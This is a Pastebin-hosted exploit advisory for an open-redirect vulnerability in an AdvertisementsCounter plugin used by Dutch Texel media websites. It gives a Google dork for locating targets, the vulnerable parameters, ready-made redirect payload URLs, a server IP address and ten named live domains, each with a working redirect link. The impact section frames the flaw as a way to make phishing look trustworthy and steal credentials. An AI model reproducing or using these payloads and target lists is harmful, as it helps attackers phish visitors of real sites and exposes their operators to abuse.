Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################################################
- # Exploit Title : HollandPlaza TexelseMedia AdvertisementsCounter Plugins Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 28/03/2019
- # Vendor Homepage : texelsemedia.nl - texelplaza.nl
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:/plugins/advertisementscounter/ site:nl
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019030235
- ##################################################################################
- # Impact :
- ***********
- HollandPlaza TexelseMedia AdvertisementsCounter Plugins accepts a user-controlled input that specifies a
- link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may
- contain a URL value and could cause the web application to redirect the request to the specified URL.
- By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and
- steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance. Open redirect is a failure in that process that makes it possible for attackers to
- steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites
- without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name
- has been changed or which has been acquired by another company. Visiting unreal web page user's computer
- becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
- ##################################################################################
- # Vulnerable File :
- *****************
- /advertisementscounter.php
- # Vulnerable Parameters :
- ***********************
- ?id=
- &url=
- ?id=[ID-NUMBER]&url=
- # Open Redirection Exploit :
- **************************
- /plugins/advertisementscounter/advertisementscounter.php?id=[ID-NUMBER]&url=https://www.[REDIRECTION-ADDRESS].gov
- /plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://www.[REDIRECTION-ADDRESS].gov
- ##################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] Vulnerable IP Address => 213.206.113.181 => There are 11 domains hosted on this server.
- [+] kabelkranttexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] texelplaza.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] texel-plaza.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] texelnieuws.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] texeldezemaand.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] texelditweekend.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] familieberichtentexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] werkoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] recreerenoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- [+] recreatieoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
- ##################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ##################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement